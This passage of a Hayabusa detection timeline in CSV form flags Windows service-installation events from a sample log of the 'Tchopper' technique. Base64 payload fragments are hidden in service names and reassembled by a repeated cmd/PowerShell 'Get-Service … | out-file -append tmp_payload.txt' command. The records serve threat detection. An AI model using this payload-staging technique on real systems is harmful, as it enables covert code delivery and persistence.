YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:33.674 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:45.277 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
